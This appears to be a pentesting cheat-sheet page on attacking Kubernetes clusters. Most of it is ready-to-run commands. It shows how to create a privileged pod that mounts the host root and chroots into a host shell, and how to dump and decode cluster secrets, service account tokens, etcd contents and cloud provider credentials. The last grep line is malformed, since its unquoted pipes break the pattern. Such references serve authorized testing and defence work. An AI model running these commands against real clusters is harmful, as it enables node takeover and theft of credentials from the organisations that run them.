Kubernetes Attacks

Exploitation

Kubernetes environments often have misconfigurations that allow privilege escalation, lateral movement, and cluster takeover.

Privilege Escalation via Pod Creation

k8s-privesc-pod.sh

bash

# If you can create pods, create a privileged one
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: pwned
spec:
  containers:
  - name: pwned
    image: ubuntu
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
EOF

# Get shell and access host filesystem
kubectl exec -it pwned -- chroot /host bash

Secret Extraction

k8s-secrets.sh

bash

# Get all secrets
kubectl get secrets -A -o yaml

# Decode base64 secrets
kubectl get secret <name> -o jsonpath='{.data.password}' | base64 -d

# Look for service account tokens
kubectl get secrets -A | grep token

# Extract etcd secrets directly
etcdctl get /registry/secrets --prefix --keys-only
etcdctl get /registry/secrets/default/mysecret

# Cloud provider credentials
kubectl get secrets -n kube-system | grep -i aws|gcp|azure

Cluster Admin

If you can create pods with the cluster-admin service account or hostPath mount, you effectively have full control of the cluster and all nodes.

Kubernetes Attacks

Privilege Escalation via Pod Creation

Secret Extraction

Related Topics

K8s Enumeration

Image Scanning